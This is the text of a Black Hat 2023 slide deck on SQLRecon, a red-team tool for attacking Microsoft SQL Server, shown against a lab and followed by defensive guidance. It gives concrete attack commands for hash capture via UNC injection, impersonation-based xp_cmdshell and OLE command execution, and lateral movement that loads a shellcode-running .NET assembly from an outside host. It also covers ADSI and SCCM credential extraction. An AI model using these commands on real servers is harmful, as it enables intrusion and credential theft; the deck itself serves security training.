SlideShare a Scribd company logo

Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLRecon

Sanjiv Kawa
Sanjiv Kawa

Video: https://youtu.be/LsYSePobFWA Conference: Black Hat USA Arsenal 2023 Presentation Title: Abusing Microsoft SQL Server with SQLRecon Presenter: Sanjiv Kawa

Technology
1 of 73
Download to read offline
#BHUSA @BlackHatEvents Abusing Microsoft SQL Server with SQLRecon Sanjiv Kawa IBM X-Force Red Adversary Services
#BHUSA @BlackHatEvents Information Classification: General Senior Managing Security Consultant, Adversary Services at IBM X-Force Red - Red Team Operator / Adversary Simulation - Post-Exploitation Tool Developer - github.com/xforcered/SQLRecon Sanjiv Kawa @sanjivkawa github.com/skahwah Intro IBM X-Force Red
#BHUSA @BlackHatEvents Information Classification: General Agenda Microsoft SQL Server Overview 2 min SQLRecon Overview 4 min 10 Demos! 20 min - Enumeration - Standard Modules - Attacking MS SQL Server with Low Privileges - Abusing MS SQL Impersonation - Attacking Linked MS SQL Servers - Attacking MS MECM / SCCM Databases Defensive Considerations 3 min Questions 5 min
#BHUSA @BlackHatEvents Information Classification: General Get Involved! Hack with me Download the latest release of SQLRecon (v3.3) from github.com/skahwah/SQLRecon/releases Spin up a Windows VM Connect to SSID SQLRecon-Lab, don’t worry, it’s safe Connection details will be provided before demo’s
#BHUSA @BlackHatEvents Information Classification: General Microsoft SQL Server Overview
#BHUSA @BlackHatEvents Information Classification: General MS SQL Server Overview Relational database which allows the storage and retrieval of data Deployed on-premise on top of Microsoft Server or in the cloud Used by businesses of all sizes, not just large enterprise networks Tightly integrated into Active Directory / Azure Active Directory
#BHUSA @BlackHatEvents Information Classification: General Why Attack MS SQL Server? Often overlooked Often misconfigured BUILTINUsers can connect to MS SQL Server by default, and: - Execute basic SQL commands - Determine privileges via user mapping/roles - UNC Path injection - Piggyback off rights to compromise linked SQL servers
#BHUSA @BlackHatEvents Information Classification: General Why Attack MS SQL Server? In late 2022, Kaspersky reported seeing a 56% rise in MS SQL Server attacks
#BHUSA @BlackHatEvents Information Classification: General SQLRecon Overview
#BHUSA @BlackHatEvents Information Classification: General What’s currently available? A good amount of offensive MS SQL Sever tools already exist
#BHUSA @BlackHatEvents Information Classification: General How did this research come about? Like most tooling … to solve a problem encountered on an engagement PowerShell is good, but C# is better when evading modern defensive controls Address the MS SQL Server C# post-exploitation tooling gap - Modernize the approach red teamers can take when facing MS SQL Server - Operational Security - Execution Guardrails - SQLRecon works with a diverse set of C2 frameworks - Fork & Run and In-Process compatible
#BHUSA @BlackHatEvents Information Classification: General New Features for Black Hat SQLRecon v2.2.2 - Windows Token - Local Database - AzureAD 3 Authentication Providers
#BHUSA @BlackHatEvents Information Classification: General New Features for Black Hat SQLRecon v2.2.2 - Windows Token - Local Database - AzureAD 3 Authentication Providers SQLRecon v3.3 + Windows Domain + Azure Local Database 5 Authentication Providers
#BHUSA @BlackHatEvents Information Classification: General New Features for Black Hat SQLRecon v2.2.2 - Enumerate and Query MS SQL databases - Execute arbitrary operating system commands - Abuse impersonation - Attack linked MS SQL servers 57 Modules
#BHUSA @BlackHatEvents Information Classification: General New Features for Black Hat SQLRecon v2.2.2 - Enumerate and Query MS SQL databases - Execute arbitrary operating system commands - Abuse impersonation - Attack linked MS SQL servers 57 Modules SQLRecon v3.3 + Ground up rewrite using MS C#/.NET code guide + Many new enumeration and execution modules + Support for attacking MECM / SCCM Databases + Better OPSEC and execution guardrails + Brand new wiki + And more! 83 Modules
#BHUSA @BlackHatEvents Information Classification: General Command Line Usage SQLRecon is straight forward to use. There are only three required arguments:
#BHUSA @BlackHatEvents Information Classification: General Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type SQLRecon.exe /Auth:WinToken
#BHUSA @BlackHatEvents Information Classification: General Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type - The hostname or IP address for a MS SQL Server SQLRecon.exe /Auth:WinToken /Host:SQL01
#BHUSA @BlackHatEvents Information Classification: General Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type - The hostname or IP address for a MS SQL Server - A module SQLRecon.exe /Auth:WinToken /Host:SQL01 /Module:databases
#BHUSA @BlackHatEvents Information Classification: General Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type - The hostname or IP address for a MS SQL Server - A module Example: Enumerating databases on a remote MS SQL Server. SQLRecon.exe /Auth:WinToken /Host:SQL01 /Module:databases
#BHUSA @BlackHatEvents Information Classification: General Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type - The hostname or IP address for a MS SQL Server - A module Example: Enumerating databases on a remote MS SQL Server SQLRecon.exe /Auth:WinToken /Host:SQL01 /Module:databases Shortform command line arguments and case-insensitive SQLRecon.exe /a:wintoken /h:172.16.10.101 /m:databases
#BHUSA @BlackHatEvents Information Classification: General Authentication Providers SQLRecon supports 5 different MS SQL Server authentication providers:
#BHUSA @BlackHatEvents Information Classification: General Authentication Providers SQLRecon supports 5 different MS SQL Server authentication providers: Authentication Type Example WinToken SQLRecon.exe /a:WinToken /h:host /m:module
#BHUSA @BlackHatEvents Information Classification: General Authentication Providers SQLRecon supports 5 different MS SQL Server authentication providers: Authentication Type Example WinToken SQLRecon.exe /a:WinToken /h:host /m:module WinDomain SQLRecon.exe /a:WinDomain /d:domain /u:user /p:pass /h:host /m:module
#BHUSA @BlackHatEvents Information Classification: General Authentication Providers SQLRecon supports 5 different MS SQL Server authentication providers: Authentication Type Example WinToken SQLRecon.exe /a:WinToken /h:host /m:module WinDomain SQLRecon.exe /a:WinDomain /d:domain /u:user /p:pass /h:host /m:module Local SQLRecon.exe /a:Local /u:user /p:pass /h:host /m:module
#BHUSA @BlackHatEvents Information Classification: General Authentication Providers SQLRecon supports 5 different MS SQL Server authentication providers: Authentication Type Example WinToken SQLRecon.exe /a:WinToken /h:host /m:module WinDomain SQLRecon.exe /a:WinDomain /d:domain /u:user /p:pass /h:host /m:module Local SQLRecon.exe /a:Local /u:user /p:pass /h:host /m:module AzureAD SQLRecon.exe /a:AzureDomain /d:domain /u:user /p:pass /h:host /m:module
#BHUSA @BlackHatEvents Information Classification: General Authentication Providers SQLRecon supports 5 different MS SQL Server authentication providers: Authentication Type Example WinToken SQLRecon.exe /a:WinToken /h:host /m:module WinDomain SQLRecon.exe /a:WinDomain /d:domain /u:user /p:pass /h:host /m:module Local SQLRecon.exe /a:Local /u:user /p:pass /h:host /m:module AzureAD SQLRecon.exe /a:AzureDomain /d:domain /u:user /p:pass /h:host /m:module AzureLocal SQLRecon.exe /a:AzureLocal /u:user /p:pass /h:host /m:module
#BHUSA @BlackHatEvents Information Classification: General Module Overview SQLRecon has 83 different modules which can be used against MS SQL Server in a variety of scenarios Listed below are modules that can facilitate with privilege escalation, lateral movement, or command execution: Module Privilege Escalation Lateral Movement Command Execution xp_cmdshell ✅ ✅ ✅ OLE Automation Procedures ✅ ✅ ✅ CLR Integration for Custom .NET Assemblies ✅ ✅ ✅ Agent Jobs ✅ ✅ ✅ Cleartext ADSI Credential Retrieval ✅ MECM / SCCM User Management ✅ Cleartext MECM / SCCM Credential Retrieval ✅
#BHUSA @BlackHatEvents Information Classification: General Demo Time
#BHUSA @BlackHatEvents Information Classification: General Get Involved! Rules Don’t DoS the lab. We’re all here to learn together. Don’t attack each other. We’re all here to learn together. You can attack AD and AAD if you want, but I promise you, it’s not going to get you anything.
#BHUSA @BlackHatEvents Information Classification: General Get Involved! WiFi SSID: SQLRecon-Lab Password: SQLReconBH2023! Lab DC01 172.16.10.100 SQL01 172.16.10.101 SQL02 172.16.10.102 SQL03 172.16.10.104 MECM01 172.16.10.103 ecom01.database.windows.net Test Connection String SQLRecon.exe /a:WinDomain /d:kawalabs /u:jsmith /p:Password123 /h:172.16.10.101 /m:whoami Rules Don’t DoS the lab. We’re all here to learn together. Don’t attack each other. We’re all here to learn together. You can attack AD and AAD if you want, but I promise you, it’s not going to get you anything.
#BHUSA @BlackHatEvents Information Classification: General Demo 1 Evaluating the current user’s permissions
#BHUSA @BlackHatEvents Information Classification: General Demo 1
#BHUSA @BlackHatEvents Information Classification: General Demo 1 Recap - Used the whoami command to determine the permissions for the current user - Determined that KAWALABSJSmith is a Domain User in the KAWALABS.LOCAL domain.
#BHUSA @BlackHatEvents Information Classification: General Demo 2 Locating MS SQL Servers in AD via SPNs
#BHUSA @BlackHatEvents Information Classification: General Demo 2
#BHUSA @BlackHatEvents Information Classification: General Demo 2 Recap - Used SQLRecon to connect to AD in context of KAWLABSJSmith and locate MS SQL Servers via registered SPNs - Used SQLRecon to connect to SQL02 in context of KAWLABSJSmith and gather MS SQL Server information SQLRecon.exe /e:SQLSpns /d:kawalabs.local SQLRecon.exe /a:WinToken /h:SQL02 /m:info
#BHUSA @BlackHatEvents Information Classification: General Demo 3 Enumerating Azure MS SQL Server Database
#BHUSA @BlackHatEvents Information Classification: General Demo 3
#BHUSA @BlackHatEvents Information Classification: General Demo 3 Recap - Used SQLRecon to connect to an Azure MS SQL Server instance in context of KAWLABSJSmith and list permissions - Used SQLRecon to connect to an Azure MS SQL Server instance in context of KAWLABSJSmith and list databases - Performed an ad-hoc SQL query to obtain the contents of the cc table in the Payments database SQLRecon.exe /a:AzureAD /d:kawalabs.onmicrosoft.com /u:jsmith /p:Password123 /h:ecom01.database.windows.net /m:whoami SQLRecon.exe /a:AzureAD /d:kawalabs.onmicrosoft.com /u:jsmith /p:Password123 /h:ecom01.databases.windows.net /m:databases SQLRecon.exe /a:AzureAD /d:kawalabs.onmicrosoft.com /u:jsmith /p:Password123 /h:ecom01.databases.windows.net /database:Payments /m:query /c:”select * from cc”
#BHUSA @BlackHatEvents Information Classification: General Demo 4 Unprivileged UNC Path Injection
#BHUSA @BlackHatEvents Information Classification: General Demo 4
#BHUSA @BlackHatEvents Information Classification: General Demo 4 Recap - Used SQLRecon to connect to SQL02 in context of KAWLABSJSmith and initiate an SMB request to receive a NetNTLMv2 hash SQLRecon.exe /a:WinToken /h:SQL02 /m:smb /rhost:172.16.10.19Projects
#BHUSA @BlackHatEvents Information Classification: General Demo 5 Operational Security and Execution Guardrails
#BHUSA @BlackHatEvents Information Classification: General Demo 5
#BHUSA @BlackHatEvents Information Classification: General Demo 5 Recap - Used SQLRecon to connect to SQL01 in context of KAWLABSJSmith and attempted to execute commands via xp_cmdshell - Attempted to enable xp_cmdshell on SQL01 in context of KAWLABSJSmith - As expected, KAWLABSJSmith encounters an execution guardrail on SQL01 due to insufficient privileges SQLRecon.exe /a:WinToken /h:SQL01 /m:xpCmd /c:notepad.exe SQLRecon.exe /a:WinToken /h:SQL01 /m:enableXP
#BHUSA @BlackHatEvents Information Classification: General Demo 6 Privilege Escalation: Abusing Impersonation BUILTINUsers can impersonate sa!
#BHUSA @BlackHatEvents Information Classification: General Demo 6 Privilege Escalation: Abusing Impersonation
#BHUSA @BlackHatEvents Information Classification: General Demo 6
#BHUSA @BlackHatEvents Information Classification: General Demo 6 Recap - Used SQLRecon to connect to SQL02 in context of KAWLABSJSmith and enumerate accounts that can be impersonated - Enabled OLE Automation Procedures on SQL02 via impersonation - Executed an arbitrary command using OLE Automation Procedures on SQL02 by abusing impersonation SQLRecon.exe /a:WinToken /h:SQL02 /m:impersonate SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iEnableOle SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iOleCmd /c:”powershell.exe ls 172.16.10.19Projects”
#BHUSA @BlackHatEvents Information Classification: General Demo 6 Recap - Enabled xp_cmdshell on SQL02 via impersonation - Executed an arbitrary command using xp_cmdshell on SQL02 by abusing impersonation - Practiced good OPSEC by reverting OLE Automation Procedures and xp_cmdshell on SQL02 to the original state SQLRecon.exe /a:WinToken /h:SQL02 /m:iEnableXp SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iXpCmd /c:tasklist SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iDisableOle SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iDisableXp
#BHUSA @BlackHatEvents Information Classification: General Demo 7 Lateral Movement: Abusing Linked MS SQL Servers SQL02 has an MS SQL Server link to SQL03
#BHUSA @BlackHatEvents Information Classification: General Demo 7 Lateral Movement: Abusing Linked MS SQL Servers
#BHUSA @BlackHatEvents Information Classification: General Demo 7 Lateral Movement: Abusing Linked MS SQL Servers - CLR Integration allows custom .NET assemblies to be imported into MS SQL Server - Assemblies get stored inside a SQL database Stored Procedure - You can then execute whatever is inside the custom assembly!
#BHUSA @BlackHatEvents Information Classification: General Demo 7 Lateral Movement: Abusing Linked MS SQL Servers Basic Template: gist.github.com/skahwah/c92a8ce41f529f40c14715c91b8f90ce Process Hollowing: gist.github.com/skahwah/a585e176e4a5cf319b0c759637f5c410 // sql.cs // C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe /target:library c:tempsql.cs using System; using System.Data; using System.Data.SqlClient; using System.Data.SqlTypes; using Microsoft.SqlServer.Server; using System.Diagnostics; public partial class StoredProcedures { [Microsoft.SqlServer.Server.SqlProcedure] public static void CustomFunctionName() { Process proc = new Process(); proc.StartInfo.FileName = "C:WindowsSystem32notepad.exe"; proc.Start(); } }
#BHUSA @BlackHatEvents Information Classification: General Demo 7
#BHUSA @BlackHatEvents Information Classification: General Demo 7 Recap - Used SQLRecon to connect to SQL02 in context of KAWLABSJSmith and enumerate linked MS SQL Server - Listed permissions on SQL03 after riding the MS SQL Server link via SQL02 - Enabled CLR Integration on SQL03 via SQL02 - Downloaded a custom .NET CLR assembly via HTTPS and executed it on SQL03 via SQL02 in order to laterally move SQLRecon.exe /a:WinToken /h:SQL02 /m:links SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lWhoami SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lEnableClr SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lClr /dll:https://cdn.popped.io/favicon.png /function:ExecuteShellcode
#BHUSA @BlackHatEvents Information Classification: General Demo 8 Credential Abuse: ADSI Double-Link Boomerang SQL03 has an ADSI link to DC01
#BHUSA @BlackHatEvents Information Classification: General Demo 8 Credential Abuse: ADSI Double-Link Boomerang
#BHUSA @BlackHatEvents Information Classification: General Demo 8
#BHUSA @BlackHatEvents Information Classification: General Demo 8 Recap - Used SQLRecon to connect to SQL02 in context of KAWLABSJSmith and enumerate links on SQL03 - Started a local LDAP server on SQL03 via SQL02 an obtained the cleartext credential for the account used to link SQL03 to DC01 SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lLinks SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lAdsi /rhost:linkADSI /lport:49103
#BHUSA @BlackHatEvents Information Classification: General Demo 9 SCCM / MECM Enumeration
#BHUSA @BlackHatEvents Information Classification: General Demo 9
#BHUSA @BlackHatEvents Information Classification: General Demo 9 Recap - Used SQLRecon to connect to the database of MECM01 and list databases - Enumerated users who are authorized to authenticate against SCCM - Listed tasks configured in SCCM SQLRecon.exe /a:WinToken /h:MECM01 /m:databases SQLRecon.exe /a:WinToken /h:MECM01 /database:CM_KAW /m:sUsers SQLRecon.exe /a:WinToken /h:MECM01 /database:CM_KAW /m:sTaskList
#BHUSA @BlackHatEvents Information Classification: General Demo 10 Privilege Escalation: SCCM / MECM
#BHUSA @BlackHatEvents Information Classification: General Demo 10
#BHUSA @BlackHatEvents Information Classification: General Demo 10 Recap - Used SQLRecon to connect to the database of MECM01 and list vaulted credentials - Decrypted SCCM vaulted credentials (shout out to Adam Chester @_xpn_) SQLRecon.exe /a:WinToken /h:MECM01 /database:CM_KAW /m:sCredentials SQLRecon.exe /a:WinToken /h:MECM01 /database:CM_KAW /m:sDecryptCredentials
#BHUSA @BlackHatEvents Information Classification: General Defensive Considerations
#BHUSA @BlackHatEvents Information Classification: General Defensive Considerations Check out the Wiki for comprehensive Prevention, Detection and Mitigation guidance! github.com/xforcered/SQLRecon/wiki
#BHUSA @BlackHatEvents Information Classification: General Defensive Considerations Top 3 Network Security Controls - Account for network routes to MS SQL Server - Limit routes to only authorized set of systems/subnets - Ensure you are receiving telemetry via network logging and monitoring tools github.com/xforcered/SQLRecon/wiki
#BHUSA @BlackHatEvents Information Classification: General Defensive Considerations Top 3 Endpoint Security Controls - Regularly control tune your EDR solutions - Evaluate if your host-based security controls (EDR / AV) supports scanning of .NET assemblies in memory - Application allow listing github.com/xforcered/SQLRecon/wiki
#BHUSA @BlackHatEvents Information Classification: General Defensive Considerations Top 3 MS SQL Server Security Controls - Follow the Microsoft SQL Server security best practices - Consider removing or restricting the BUILTINUsers account and low privilege groups from authenticating against MS SQL Server instances - Evaluate impersonation and MS SQL Server links github.com/xforcered/SQLRecon/wiki
#BHUSA @BlackHatEvents Information Classification: General @sanjivkawa github.com/skahwah Thank You IBM X-Force Red @xforcered github.com/xforcered/SQLRecon Question or Comments?

Recommended

DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLReconDEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLReconSanjiv Kawa
 
Welcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWSWelcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWSMike Felch
 
Go Observability (in practice)
Go Observability (in practice)Go Observability (in practice)
Go Observability (in practice)Eran Levy
 
Linux privilege escalation
Linux privilege escalationLinux privilege escalation
Linux privilege escalationSongchaiDuangpan
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X WayStephan Borosh
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopPaul Ionescu
 
Apache Pulsar First Overview
Apache Pulsar First OverviewApache Pulsar First Overview
Apache Pulsar First OverviewRicardo Paiva
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabTeymur Kheirkhabarov
 

Recommended

DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLReconDEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLReconSanjiv Kawa
 
Welcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWSWelcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWSMike Felch
 
Go Observability (in practice)
Go Observability (in practice)Go Observability (in practice)
Go Observability (in practice)Eran Levy
 
Linux privilege escalation
Linux privilege escalationLinux privilege escalation
Linux privilege escalationSongchaiDuangpan
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X WayStephan Borosh
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopPaul Ionescu
 
Apache Pulsar First Overview
Apache Pulsar First OverviewApache Pulsar First Overview
Apache Pulsar First OverviewRicardo Paiva
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabTeymur Kheirkhabarov
 
The Rise of Active Directory Exploits
The Rise of Active Directory ExploitsThe Rise of Active Directory Exploits
The Rise of Active Directory ExploitsEnterprise Management Associates
 
Flink Forward Berlin 2017: Dongwon Kim - Predictive Maintenance with Apache F...
Flink Forward Berlin 2017: Dongwon Kim - Predictive Maintenance with Apache F...Flink Forward Berlin 2017: Dongwon Kim - Predictive Maintenance with Apache F...
Flink Forward Berlin 2017: Dongwon Kim - Predictive Maintenance with Apache F...Flink Forward
 
Wait! What’s going on inside my database?
Wait! What’s going on inside my database?Wait! What’s going on inside my database?
Wait! What’s going on inside my database?Jeremy Schneider
 
Unsecuring SSH
Unsecuring SSHUnsecuring SSH
Unsecuring SSHJeremy Brown
 
Data Streaming Ecosystem Management at Booking.com
Data Streaming Ecosystem Management at Booking.com Data Streaming Ecosystem Management at Booking.com
Data Streaming Ecosystem Management at Booking.com confluent
 
Distributed Lock Manager
Distributed Lock ManagerDistributed Lock Manager
Distributed Lock ManagerHao Chen
 
Pragmatic RESTful API Design: Apigee Webinar
Pragmatic RESTful API Design: Apigee WebinarPragmatic RESTful API Design: Apigee Webinar
Pragmatic RESTful API Design: Apigee WebinarApigee | Google Cloud
 
Harnessing the Power of AI in AWS Pentesting.pdf
Harnessing the Power of AI in AWS Pentesting.pdfHarnessing the Power of AI in AWS Pentesting.pdf
Harnessing the Power of AI in AWS Pentesting.pdfMike Felch
 
HotPics 2021
HotPics 2021HotPics 2021
HotPics 2021neexemil
 
PostgreSQL and RAM usage
PostgreSQL and RAM usagePostgreSQL and RAM usage
PostgreSQL and RAM usageAlexey Bashtanov
 
PostgreSQL Administration for System Administrators
PostgreSQL Administration for System AdministratorsPostgreSQL Administration for System Administrators
PostgreSQL Administration for System AdministratorsCommand Prompt., Inc
 
PostgreSQL WAL for DBAs
PostgreSQL WAL for DBAs PostgreSQL WAL for DBAs
PostgreSQL WAL for DBAs PGConf APAC
 
Révolution eBPF - un noyau dynamique
Révolution eBPF - un noyau dynamiqueRévolution eBPF - un noyau dynamique
Révolution eBPF - un noyau dynamiqueRaphaël PINSON
 
Native Support of Prometheus Monitoring in Apache Spark 3.0
Native Support of Prometheus Monitoring in Apache Spark 3.0Native Support of Prometheus Monitoring in Apache Spark 3.0
Native Support of Prometheus Monitoring in Apache Spark 3.0Databricks
 
[CB21] MUSHIKAGO: IT and OT Automation Penetration testing Tool Using Game AI...
[CB21] MUSHIKAGO: IT and OT Automation Penetration testing Tool Using Game AI...[CB21] MUSHIKAGO: IT and OT Automation Penetration testing Tool Using Game AI...
[CB21] MUSHIKAGO: IT and OT Automation Penetration testing Tool Using Game AI...CODE BLUE
 
Basic Dynamic Analysis of Malware
Basic Dynamic Analysis of MalwareBasic Dynamic Analysis of Malware
Basic Dynamic Analysis of MalwareNatraj G
 
Expert Day 2019 - SUSE Linux Enterprise 15
Expert Day 2019 - SUSE Linux Enterprise 15Expert Day 2019 - SUSE Linux Enterprise 15
Expert Day 2019 - SUSE Linux Enterprise 15SUSE
 
Temporal intro and event loop
Temporal intro and event loopTemporal intro and event loop
Temporal intro and event loopTihomirSurdilovic
 
Exploring how Students Map Social Engineering Techniques to the ATT&CK Framew...
Exploring how Students Map Social Engineering Techniques to the ATT&CK Framew...Exploring how Students Map Social Engineering Techniques to the ATT&CK Framew...
Exploring how Students Map Social Engineering Techniques to the ATT&CK Framew...MITRE ATT&CK
 
Thick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptxThick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptxAnurag Srivastava
 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdfGabriel Mathenge
 
SQL Injection
SQL InjectionSQL Injection
SQL InjectionAbhinav Nair
 

More Related Content

What's hot

Flink Forward Berlin 2017: Dongwon Kim - Predictive Maintenance with Apache F...
Flink Forward Berlin 2017: Dongwon Kim - Predictive Maintenance with Apache F...Flink Forward Berlin 2017: Dongwon Kim - Predictive Maintenance with Apache F...
Flink Forward Berlin 2017: Dongwon Kim - Predictive Maintenance with Apache F...Flink Forward
 
Wait! What’s going on inside my database?
Wait! What’s going on inside my database?Wait! What’s going on inside my database?
Wait! What’s going on inside my database?Jeremy Schneider
 
Data Streaming Ecosystem Management at Booking.com
Data Streaming Ecosystem Management at Booking.com Data Streaming Ecosystem Management at Booking.com
Data Streaming Ecosystem Management at Booking.com confluent
 
Distributed Lock Manager
Distributed Lock ManagerDistributed Lock Manager
Distributed Lock ManagerHao Chen
 
Pragmatic RESTful API Design: Apigee Webinar
Pragmatic RESTful API Design: Apigee WebinarPragmatic RESTful API Design: Apigee Webinar
Pragmatic RESTful API Design: Apigee WebinarApigee | Google Cloud
 
Harnessing the Power of AI in AWS Pentesting.pdf
Harnessing the Power of AI in AWS Pentesting.pdfHarnessing the Power of AI in AWS Pentesting.pdf
Harnessing the Power of AI in AWS Pentesting.pdfMike Felch
 
HotPics 2021
HotPics 2021HotPics 2021
HotPics 2021neexemil
 
PostgreSQL Administration for System Administrators
PostgreSQL Administration for System AdministratorsPostgreSQL Administration for System Administrators
PostgreSQL Administration for System AdministratorsCommand Prompt., Inc
 
PostgreSQL WAL for DBAs
PostgreSQL WAL for DBAs PostgreSQL WAL for DBAs
PostgreSQL WAL for DBAs PGConf APAC
 
Révolution eBPF - un noyau dynamique
Révolution eBPF - un noyau dynamiqueRévolution eBPF - un noyau dynamique
Révolution eBPF - un noyau dynamiqueRaphaël PINSON
 
Native Support of Prometheus Monitoring in Apache Spark 3.0
Native Support of Prometheus Monitoring in Apache Spark 3.0Native Support of Prometheus Monitoring in Apache Spark 3.0
Native Support of Prometheus Monitoring in Apache Spark 3.0Databricks
 
[CB21] MUSHIKAGO: IT and OT Automation Penetration testing Tool Using Game AI...
[CB21] MUSHIKAGO: IT and OT Automation Penetration testing Tool Using Game AI...[CB21] MUSHIKAGO: IT and OT Automation Penetration testing Tool Using Game AI...
[CB21] MUSHIKAGO: IT and OT Automation Penetration testing Tool Using Game AI...CODE BLUE
 
Basic Dynamic Analysis of Malware
Basic Dynamic Analysis of MalwareBasic Dynamic Analysis of Malware
Basic Dynamic Analysis of MalwareNatraj G
 
Expert Day 2019 - SUSE Linux Enterprise 15
Expert Day 2019 - SUSE Linux Enterprise 15Expert Day 2019 - SUSE Linux Enterprise 15
Expert Day 2019 - SUSE Linux Enterprise 15SUSE
 
Temporal intro and event loop
Temporal intro and event loopTemporal intro and event loop
Temporal intro and event loopTihomirSurdilovic
 
Exploring how Students Map Social Engineering Techniques to the ATT&CK Framew...
Exploring how Students Map Social Engineering Techniques to the ATT&CK Framew...Exploring how Students Map Social Engineering Techniques to the ATT&CK Framew...
Exploring how Students Map Social Engineering Techniques to the ATT&CK Framew...MITRE ATT&CK
 
Thick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptxThick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptxAnurag Srivastava
 

What's hot (20)

The Rise of Active Directory Exploits
The Rise of Active Directory ExploitsThe Rise of Active Directory Exploits
The Rise of Active Directory Exploits
 
Flink Forward Berlin 2017: Dongwon Kim - Predictive Maintenance with Apache F...
Flink Forward Berlin 2017: Dongwon Kim - Predictive Maintenance with Apache F...Flink Forward Berlin 2017: Dongwon Kim - Predictive Maintenance with Apache F...
Flink Forward Berlin 2017: Dongwon Kim - Predictive Maintenance with Apache F...
 
Wait! What’s going on inside my database?
Wait! What’s going on inside my database?Wait! What’s going on inside my database?
Wait! What’s going on inside my database?
 
Unsecuring SSH
Unsecuring SSHUnsecuring SSH
Unsecuring SSH
 
Data Streaming Ecosystem Management at Booking.com
Data Streaming Ecosystem Management at Booking.com Data Streaming Ecosystem Management at Booking.com
Data Streaming Ecosystem Management at Booking.com
 
Distributed Lock Manager
Distributed Lock ManagerDistributed Lock Manager
Distributed Lock Manager
 
Pragmatic RESTful API Design: Apigee Webinar
Pragmatic RESTful API Design: Apigee WebinarPragmatic RESTful API Design: Apigee Webinar
Pragmatic RESTful API Design: Apigee Webinar
 
Harnessing the Power of AI in AWS Pentesting.pdf
Harnessing the Power of AI in AWS Pentesting.pdfHarnessing the Power of AI in AWS Pentesting.pdf
Harnessing the Power of AI in AWS Pentesting.pdf
 
HotPics 2021
HotPics 2021HotPics 2021
HotPics 2021
 
PostgreSQL and RAM usage
PostgreSQL and RAM usagePostgreSQL and RAM usage
PostgreSQL and RAM usage
 
PostgreSQL Administration for System Administrators
PostgreSQL Administration for System AdministratorsPostgreSQL Administration for System Administrators
PostgreSQL Administration for System Administrators
 
PostgreSQL WAL for DBAs
PostgreSQL WAL for DBAs PostgreSQL WAL for DBAs
PostgreSQL WAL for DBAs
 
Révolution eBPF - un noyau dynamique
Révolution eBPF - un noyau dynamiqueRévolution eBPF - un noyau dynamique
Révolution eBPF - un noyau dynamique
 
Native Support of Prometheus Monitoring in Apache Spark 3.0
Native Support of Prometheus Monitoring in Apache Spark 3.0Native Support of Prometheus Monitoring in Apache Spark 3.0
Native Support of Prometheus Monitoring in Apache Spark 3.0
 
[CB21] MUSHIKAGO: IT and OT Automation Penetration testing Tool Using Game AI...
[CB21] MUSHIKAGO: IT and OT Automation Penetration testing Tool Using Game AI...[CB21] MUSHIKAGO: IT and OT Automation Penetration testing Tool Using Game AI...
[CB21] MUSHIKAGO: IT and OT Automation Penetration testing Tool Using Game AI...
 
Basic Dynamic Analysis of Malware
Basic Dynamic Analysis of MalwareBasic Dynamic Analysis of Malware
Basic Dynamic Analysis of Malware
 
Expert Day 2019 - SUSE Linux Enterprise 15
Expert Day 2019 - SUSE Linux Enterprise 15Expert Day 2019 - SUSE Linux Enterprise 15
Expert Day 2019 - SUSE Linux Enterprise 15
 
Temporal intro and event loop
Temporal intro and event loopTemporal intro and event loop
